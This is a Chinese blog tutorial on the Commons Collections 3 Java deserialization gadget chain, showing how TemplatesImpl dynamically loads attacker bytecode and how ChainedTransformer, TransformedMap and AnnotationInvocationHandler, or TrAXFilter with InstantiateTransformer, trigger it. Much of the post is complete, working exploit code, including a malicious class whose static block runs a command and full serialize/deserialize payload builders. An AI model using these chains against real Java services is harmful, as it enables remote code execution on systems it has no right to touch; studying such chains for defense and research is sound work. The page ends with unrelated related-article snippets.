【无标题】

于 2023-09-16 20:13:41 发布
阅读量50 收藏
点赞数
文章标签: javascript visual studio python 决策树 最小二乘法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stopluox/article/details/132923189
版权

CommonsCollections3

在CC1和CC6中,我们最终弹计算器都是通过Runtime.exec进行调用,从CC3我们要介绍一种不通过Runtime来弹计算器的方法,也就是Java中常提到的动态类加载,动态类加载可以让我们通过一个路径来加载一个恶意类,如果这个恶意类在静态代码块或构造代码块中写入了恶意方法,那么我们就可以通过找一条链子来初始化这个类(一般在进行实例化时会对类进行初始化),从而达到代码块中的代码执行。

ClassLoader中的defineClass最终实现了类的动态加载(后面还有一些过程但已经是依靠c来实现的了),在ClassLoader中可以看到一堆defineClass,我们查找用法,看一下哪个defineClass在别处被调用了,而且权限最好是default或者public,方便我们利用,最终锁定下面这个:

protected final Class<?> defineClass(String name, byte[] b, int off, int len)
throws ClassFormatError
这个defineClass被调用的点在com.sun.org.apache.xalan.internal.xsltc.trax中的TemplatesImpl.TransletClassLoader下,也是一个defineClass:
在这里插入图片描述

这个defineClass又在当前类中被defineTransletClasses调用:
在这里插入图片描述

defineTransletClasses同类下有三个被调用点,我们看一下哪个方法可以被我们利用:
在这里插入图片描述

第一个返回_class:

private synchronized Class[] getTransletClasses() {
try {
if (_class == null) defineTransletClasses();
}
catch (TransformerConfigurationException e) {
// Falls through
}
return _class;
}
第二个返回了_class的下标:

public synchronized int getTransletIndex() {
try {
if (_class == null) defineTransletClasses();
}
catch (TransformerConfigurationException e) {
// Falls through
}
return _transletIndex;
}
第三个方法我们主要看newInstance这里,这个_class[_transletIndex]可控(通过上面找到的defineTransletClasses动态加载进来),如果我们让_class为我们所构造的恶意类并让它newInstance,那么就可以执行恶意类中的静态/构造代码块中的代码,所以我们接着找这个方法的调用点:

private Translet getTransletInstance()
throws TransformerConfigurationException {
try {
if (_name == null) return null;

        if (_class == null) defineTransletClasses();

        // The translet needs to keep a reference to all its auxiliary
        // class to prevent the GC from collecting them
        AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();

下一调用点还是在这个类中,我们找到newTransformer()这个方法:

public synchronized Transformer newTransformer()
throws TransformerConfigurationException
{
TransformerImpl transformer;

    transformer = new TransformerImpl(getTransletInstance(), _outputProperties,
        _indentNumber, _tfactory);

我们来梳理一下到目前的调用链,很短也很方便在这里插入图片描述

我们先将payload写出来:

TemplatesImpl templatesimpl = new TemplatesImpl();
templatesimpl.newTransformer();
写完啦 下班!(开个玩笑)逻辑上来说这两行代码确实是完整的调用链,我们接下来要做的就是对类内部的各种属性进行赋值:

newTransformer内不需要进行赋值操作,跟进到getTransletInstance中 ,类内没有对_name和_class进行赋值,如果想要触发defineTransletClasses()我们就需要让_name不为空,_class为空,直接不给_class赋值即可:

if (_name == null) return null;

if (_class == null) defineTransletClasses();
继续跟进到defineTransletClasses中 ,如果想要走到下面动态加载_class,我们这里要注意对_tfactory进行赋值,否则对一个空属性调用方法,会爆空指针异常:

return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
上一步之后我们在对_class赋值这里可以看到是通过修改_bytecodes从而控制_class的值:

for (int i = 0; i < classCount; i++) {
_class[i] = loader.defineClass(_bytecodes[i]);
一共三个需要修改的值,TemplatesImpl类是可序列化的,所以我们可以直接通过反射修改这些值,看一下这几个值的类型:

private String _name = null;
private byte[][] _bytecodes = null;
private transient TransformerFactoryImpl _tfactory = null;
都是private属性,所以要用setAccessible 来修改访问权限,name是String类型,所以直接赋个字符串就行:

Class tmp = templatesimpl.getClass();
Field nameField = tmp.getDeclaredField(“_name”);
nameField.setAccessible(true);
nameField.set(templatesimpl,“y1”);
再看_bytecodes,一个二维数组,但我们在给_class赋值时defineClass接受的却是一个一维数组:

for (int i = 0; i < classCount; i++) {
_class[i] = loader.defineClass(_bytecodes[i]);

Class defineClass(final byte[] b) {
return defineClass(null, b, 0, b.length);
所以我们给_bytecodes 赋值时可以将defineClass接收的一维数组放进_bytecodes这个二维数组中,这样在进行for循环遍历时就可以将这个一维数组遍历出来并传给defineClass,这个class需要我们在写好java源码后手动编译为class文件,最好把这个class文件复制到电脑上的别的地方再在这里使用(编译后的class文件一般在target下):

Field bytecodesField = tmp.getDeclaredField(“_bytecodes”);
bytecodesField.setAccessible(true);
byte[] code = Files.readAllBytes(Paths.get(“/Users/y1zh3e7/Desktop/Test.class”));
byte[][] codes = {code};
bytecodesField.set(templatesimpl,codes);
Test.class

public class Calc {
static{
try {
Runtime.getRuntime().exec(“open -na Calculator”); //这里是mac弹计算器的命令
} catch (IOException e) { //win下还是calc
throw new RuntimeException(e);
}

}

}
然后我们再来改_tfactory的值:

这里要注意一下,被transient关键字修饰的属性是不参与序列化的,也就是说就算我们通过反射修改了它的值,反序列化后的二进制流这个属性的值也依旧是null,所以这里我们要用其他的方式赋值

private transient TransformerFactoryImpl _tfactory = null;
我们在readObject中发现有对这些属性进行赋值的操作,_tfactory的值是一个TransformerFactoryImpl实例:

_name = (String)gf.get(“_name”, null);
//以下几行代码对序列化流中的属性读取它们的值,如果读不到值那么将它的值设为默认值(第二个参数)
_bytecodes = (byte[][])gf.get(“_bytecodes”, null);
_class = (Class[])gf.get(“_class”, null);
_transletIndex = gf.get(“_transletIndex”, -1);

    _outputProperties = (Properties)gf.get("_outputProperties", null);
    _indentNumber = gf.get("_indentNumber", 0);

    if (is.readBoolean()) {
        _uriResolver = (URIResolver) is.readObject();
    }

    _tfactory = new TransformerFactoryImpl();
}

我们先不进行序列化和反序列化,我们先用反射修改_tfactory的值,看看能不能弹计算器(这里我们并没有进行序列化和反序列化,所以其实就是用反射修改了个值,所以是可以修改成功的):

TemplatesImpl templatesimpl = new TemplatesImpl();
Class tmp = templatesimpl.getClass();

    Field nameField = tmp.getDeclaredField("_name");
    nameField.setAccessible(true);
    nameField.set(templatesimpl,"y1");

    Field bytecodesField = tmp.getDeclaredField("_bytecodes");
    bytecodesField.setAccessible(true);
    byte[] code = Files.readAllBytes(Paths.get("/Users/y1zh3e7/Desktop/Test.class"));
    byte[][] codes = {code};
    bytecodesField.set(templatesimpl,codes);

    Field tfactoryfield = tmp.getDeclaredField("_tfactory");
    tfactoryfield.setAccessible(true);
    tfactoryfield.set(templatesimpl,new TransformerFactoryImpl());
    templatesimpl.newTransformer();

没有弹出来计算器,爆了空指针异常,通过调试发现在_class成功加载类后,是这里抛出了异常:

final Class superClass = _class[i].getSuperclass();
if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
_transletIndex = i;
}
else {
_auxClasses.put(_class[i].getName(), _class[i]);
}
}

        if (_transletIndex < 0) {
            ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }

第一个if检查_class的父类是否叫ABSTRACT_TRANSLET ,如果没有进入到if里面那么else中的_auxClasses为空,就会抛空指针,并且下面第二个if中也会抛异常,为了避免这两个抛异常的点,我们需要将_class加载的恶意类继承名为ABSTRACT_TRANSLET 的父类:

private static String ABSTRACT_TRANSLET
= “com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet”;
修改恶意类,继承的父类中有两个抽象方法需要进行重写:

public class Calc extends AbstractTranslet{
static{
try {
Runtime.getRuntime().exec(“open -na Calculator”);
} catch (IOException e) {
throw new RuntimeException(e);
}

}

@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

}

@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

}

}
现在就可以弹出计算器了,如果你这里没有弹出来,看一下import的包是不是有问题,TemplatesImpl和TransformerFactoryImpl的路径一定要是com.xxx,如果是org.xxx是不能用的:

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

public class CC3Test {
public static void main(String[] args) throws Exception{
TemplatesImpl templatesimpl = new TemplatesImpl();
Class tmp = templatesimpl.getClass();

    Field nameField = tmp.getDeclaredField("_name");
    nameField.setAccessible(true);
    nameField.set(templatesimpl,"y1");

    Field bytecodesField = tmp.getDeclaredField("_bytecodes");
    bytecodesField.setAccessible(true);
    byte[] code = Files.readAllBytes(Paths.get("/Users/y1zh3e7/Desktop/Test.class"));
    byte[][] codes = {code};
    bytecodesField.set(templatesimpl,codes);

    Field tfactoryfield = tmp.getDeclaredField("_tfactory");
    tfactoryfield.setAccessible(true);
    tfactoryfield.set(templatesimpl,new TransformerFactoryImpl());
    templatesimpl.newTransformer();

}

}
下面我们要想办法执行templatesimpl.newTransformer,这里依旧是用CC1中用到的InvokerTransformer.transform进行代码的执行:

TemplatesImpl templatesimpl = new TemplatesImpl();
Class tmp = templatesimpl.getClass();

    Field nameField = tmp.getDeclaredField("_name");
    nameField.setAccessible(true);
    nameField.set(templatesimpl,"y1");

    Field bytecodesField = tmp.getDeclaredField("_bytecodes");
    bytecodesField.setAccessible(true);
    byte[] code = Files.readAllBytes(Paths.get("/Users/y1zh3e7/Desktop/Test.class"));
    byte[][] codes = {code};
    bytecodesField.set(templatesimpl,codes);

    Field tfactoryfield = tmp.getDeclaredField("_tfactory");
    tfactoryfield.setAccessible(true);
    tfactoryfield.set(templatesimpl,new TransformerFactoryImpl());
    ChainedTransformer ctf = new ChainedTransformer(new Transformer[]{
        new ConstantTransformer(templatesimpl),
        new InvokerTransformer("newTransformer",null,null)
    });
    ctf.transform(1);

剩下的找Chainedtransformer.transform 的调用点就和CC1后面一样了,直接粘过来就是:

package ysoserial.payloads.Test;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

import static ysoserial.payloads.util.Test.util.Serialize.serialize;
import static ysoserial.payloads.util.Test.util.Unserialize.unserialize;

public class CC3Test {
public static void main(String[] args) throws Exception{
TemplatesImpl templatesimpl = new TemplatesImpl();
Class tmp = templatesimpl.getClass();

    Field nameField = tmp.getDeclaredField("_name");
    nameField.setAccessible(true);
    nameField.set(templatesimpl,"y1");

    Field bytecodesField = tmp.getDeclaredField("_bytecodes");
    bytecodesField.setAccessible(true);
    byte[] code = Files.readAllBytes(Paths.get("/Users/y1zh3e7/Desktop/Test.class"));
    byte[][] codes = {code};
    bytecodesField.set(templatesimpl,codes);

    Field tfactoryfield = tmp.getDeclaredField("_tfactory");
    tfactoryfield.setAccessible(true);
    tfactoryfield.set(templatesimpl,new TransformerFactoryImpl());
    ChainedTransformer ctf = new ChainedTransformer(new Transformer[]{
        new ConstantTransformer(templatesimpl),
        new InvokerTransformer("newTransformer",null,null)
    });
    HashMap map = new HashMap();
    map.put("value","v");
    Map<Object,Object> transformedMap = TransformedMap.decorate(map,null,ctf);
    Class annotationInvocationHandler = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor annotationInvocationHandlerconstructor = annotationInvocationHandler.getDeclaredConstructor(Class.class,Map.class);
    annotationInvocationHandlerconstructor.setAccessible(true);
    Object o = annotationInvocationHandlerconstructor.newInstance(Target.class,transformedMap);
    serialize(o);
    unserialize("ser.bin");

}

}
相较于CC1来说一个是通过调用Runtime来进行命令执行,一个是通过动态类加载进行代码执行,如果过滤了Runtime我们就可以尝试用这条CC3

接下来我们在来说ysoserial上用的另一条调用链:

我们回到newTransformer,刚才说的是用CC1后半段直接调用,我们接着向下找调用newTransformer 的地方,最终锁定在了com/sun/org/apache/xalan/internal/xsltc/trax/TrAXFilter.java 这个类上,这个类没有继承serialize接口,也就是说我们没办法通过反射来修改实例中属性的值,但是我们想到对属性值进行初始化的操作一般在构造函数中,我们来看一下它的构造函数:

public TrAXFilter(Templates templates) throws
TransformerConfigurationException
{
_templates = templates;
_transformer = (TransformerImpl) templates.newTransformer();
_transformerHandler = new TransformerHandlerImpl(_transformer);
_useServicesMechanism = _transformer.useServicesMechnism();
}
我们可以通过这个构造函数来控制这个templates的值,所以下一步就是要找可以调用这个构造函数的地方,ysoserial中给出了InstantiateTransformer 这个类,通过它的构造函数和transform方法可以调用一个对象的指定参数的构造函数:

public InstantiateTransformer(Class[] paramTypes, Object[] args) {
this.iParamTypes = paramTypes;
this.iArgs = args;
}

public Object transform(Object input) {
try {
if (!(input instanceof Class)) {
throw new FunctorException("InstantiateTransformer: Input object was not an instanceof Class, it was a " + (input == null ? “null object” : input.getClass().getName()));
} else {
Constructor con = ((Class)input).getConstructor(this.iParamTypes);
return con.newInstance(this.iArgs);
}
也就是说下面两行代码就可以执行newTransformer了:

InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templatesimpl});
instantiateTransformer.transform(TrAXFilter.class);
最终还是用ChainedTransformer包裹起来执行:

TemplatesImpl templatesimpl = new TemplatesImpl();
Class tmp = templatesimpl.getClass();

    Field nameField = tmp.getDeclaredField("_name");
    nameField.setAccessible(true);
    nameField.set(templatesimpl,"y1");

    Field bytecodesField = tmp.getDeclaredField("_bytecodes");
    bytecodesField.setAccessible(true);
    byte[] code = Files.readAllBytes(Paths.get("/Users/y1zh3e7/Desktop/Test.class"));
    byte[][] codes = {code};
    bytecodesField.set(templatesimpl,codes);

    Field tfactoryfield = tmp.getDeclaredField("_tfactory");
    tfactoryfield.setAccessible(true);
    tfactoryfield.set(templatesimpl,new TransformerFactoryImpl());

    InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templatesimpl});
    ChainedTransformer ctf = new ChainedTransformer(new Transformer[]{
        new ConstantTransformer(TrAXFilter.class),
        instantiateTransformer
    });
    HashMap map = new HashMap();
    map.put("value","v");
    Map<Object,Object> transformedMap = TransformedMap.decorate(map,null,ctf);
    Class annotationInvocationHandler = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor annotationInvocationHandlerconstructor = annotationInvocationHandler.getDeclaredConstructor(Class.class,Map.class);
    annotationInvocationHandlerconstructor.setAccessible(true);
    Object o = annotationInvocationHandlerconstructor.newInstance(Target.class,transformedMap);
    serialize(o);
    unserialize("ser.bin");

完整的CC6调用链,当InvokerTransformer被ban时就可以用这条链:
在这里插入图片描述

喜欢蹲局子的小猿同学
关注
Mac使用java Runtime.getRuntime().exec()执行终端命令
yulianpeng的博客
12-23 4334
导语 因为要在页面中做数据库备份还原功能,所以要使用java代码执行Mac终端命令,尝试了很久,终于执行成功,主要原因为Linux和windows版本的传参方式误导了我,浪费了很长时间 注意事项 终端中运行的程序(软件)需要指定完整路径,就算是配置了环境变量,在执行(exec)时也会因为读取不到软件目录而执行失败,因此一定要指定程序完整路径。 Mac下只需传入完整的终端命令即可。 目录也不要使用~代替 适用于简单情况。 代码演示 在桌面上创建一个文件a.md Process pr
mac环境下,java程序中使用Runtime.getRuntime().exec(command)执行shell脚本报Cannot run program, error=2
hydy的博客
12-30 1420
https://stackoverflow.com/questions/30329480/i-am-getting-the-following-error-when-i-run-mvn-on-os-x-mavericks-cannot-run-pr 如高赞答案所说,赋予lib/jspawnhelper文件可执行权限即可
java runtime for mac_Mac命令中的Java命令Runtime.getRuntime().exec()
weixin_42417004的博客
02-20 506
我使用的是Mac OS Lion,java版本为1.6.0_26我正在为Java制作一个小型应用程序,并为用户提供主菜单,因此他可以选择多个选项.其中之一是使用.pkg安装应用程序使用这些命令一切正常:File instFolder = new File(System.getProperty("user.dir") + "/foldername/appInstaller.pkg");String ...
java 调用计算机程序方法
qq_36521848的博客
03-01 349
示例代码: package com.test.utils; import java.io.IOException; /** * * @title: 打开计算器十次 * @author: wll * @since: 2021-11-16 16:53:47 */ public class CallCalc { public static void main(String[] args) throws IOException, InterruptedException { for (..
Runtime.getRuntime().exec()方法
热门推荐
chaochao2113的博客
11-03 3万+
1.使用Runtime.getRuntime().exec()方法 sshUtil.java package com.demo; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import ch.ethz.ssh2.Connection; import ch.ethz.ssh2.Session; import
c#实现无标题栏窗口的拖动
09-05
本篇文章将详细讲解如何在C#中实现这种无标题栏窗口的拖动以及其他基本操作。 首先,为了实现无标题栏窗口的拖动,我们需要处理窗体的鼠标事件。窗体的`FormBorderStyle`属性应设置为`None`,这会去除窗体的边框和...
Qt无标题窗口
05-21
在本文中,我们将深入探讨如何使用Qt框架创建一个无标题窗口,这在界面设计和自定义标题栏美化中非常有用。我们将关注`framelesswidget.cpp`、`main.cpp`、`framelesswidget.h`等核心文件,理解它们在实现无标题窗口...
C#创建无标题栏窗体
03-16
摘要:C#源码,菜单窗体,无标题栏窗体 C#创建无标题栏窗体源码,实际上是动态显示或隐藏窗体的标题栏,当隐藏的时候就类似窗体没有了标题栏,当显示标题栏的时候,鼠标按住标题栏即可拖动窗体,以前记得网友需要此...
Delphi实现拖动按钮移动无标题栏窗口
05-11
摘要:Delphi源码,界面编程,窗体拖动,无标题无标题栏的窗体的拖动功能实现,Delphi添加一个可拖动窗体的按钮,通过对此按钮的控制可移动窗体,实现按住标题栏移动窗口的功能,无标题栏也就不能显示最大化、最小化...
VC去掉'无标题'字样的方法.zip
11-21
在使用Visual C++进行编程时,我们经常会在创建新的窗口或者对话框时默认看到标题栏显示为“无标题”。这可能会对用户界面的美观性和专业性造成一定的影响。本资料包提供了一种方法来帮助开发者去掉这个“无标题”...
JavaRuntime
12-11
macos JavaRuntime 安装mac系统无线网卡,驱动需要,
RunTime.getRuntime().exec()运行脚本命令介绍和阻塞
dieweidong5625的博客
03-04 3692
java在企业级项目开发中,无论是强制性的功能需要,还是为了简便java的实现,需要调用服务器命令脚本来执行。在java中,RunTime.getRuntime().exec()就实现了这个功能。用法: public Process exec(String command)-----在单独的进程中执行指定的字符串命令。 public Pro...
Mac环境下Java使用Runtime.getRuntime().exec调用python不成功
qq_40046204的博客
05-14 871
python执行的时候使用绝对地址执行 String[] cmd = {"python的绝对地址", p,s}; Process proc; try { proc = Runtime.getRuntime().exec(cmd); BufferedReader in = new BufferedReader(new InputStreamReader(proc.getInputStream())); S
Runtime.getRuntime().exec(...)使用方法
weixin_30352191的博客
03-31 648
Runtime.getRuntime().exec(...)使用方法 如果想要了解更多的信息,参阅代码里面给的链接 下面是这个正确的例子 publicclassRuntimeExec{ /***Runtimeexecute.**@paramcmdthecommand....
关于Runtime.getRuntime().exec()的使用和讲解
qq_40474507的博客
08-13 2万+
自己学习Runtime.getRuntime().exec()之后明白其用法,但是总结不出它的功能,在查阅网上资料找到一个比较通俗易懂且全面的答案:在java中,RunTime.getRuntime().exec()实现了调用服务器命令脚本来执行功能需要。 如果我们想在500秒后使电脑关机则需要在运行中输入 cmd ,打开命令弹框中输入: //添加一个60S后自动关闭计算机的计划。 shutdown -s -t 500 通过Runtime.getRuntime().exec()我们可以这样写 //
Java使用Runtime.getRuntime().exec()时的运行输出 问题解决
xiaogangwang2012的专栏
12-31 1万+
问题:在Java中使用Runtime.getRuntime().exec()启动一个进程,发现该进程成功启动,但无法获得该进程的打印输出,网上浏览一番,发现一方案,经验证可行,整理一下贴出来备忘。 /* *Main */ public class StreamOutputTest{ public static void main(String[] args)  {
Mac中使用eclipse做java项目,使用Runtime执行命令行的命令报错解决方法
doctorq
06-08 4525
有的时候我们需要在Runtime.getRuntime().exec("adb devices") 来执行adb命令,但是在mac下使用eclipse可能会报错,解决方法也很简单 错误信息06-04 19:34:10 E/adb: Unable to locate adb. Please use SDK Manager and check if Android SDK 解决方法在eclipse项目
调用Runtime.getRuntime().exec后等待命令处理完毕的问题
shappy1978的专栏
07-06 2512
try{ String command = "xxx"; Process child = Runtime.getRuntime().exec(command); child.waitFor(); }catch(Exception e){ e.printStackTrace(); }  上面的语句在unix和mac下调用都没问题,但是win...
设置无标题 android
最新发布
05-02
在Android应用中,设置无标题是一种简洁和美观的设计方式,可以为用户提供更流畅的使用体验。以下是一些实现设置无标题的方法: 1. 在Android的Manifest文件中,找到对应Activity的标签,并添加”android:theme="@...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值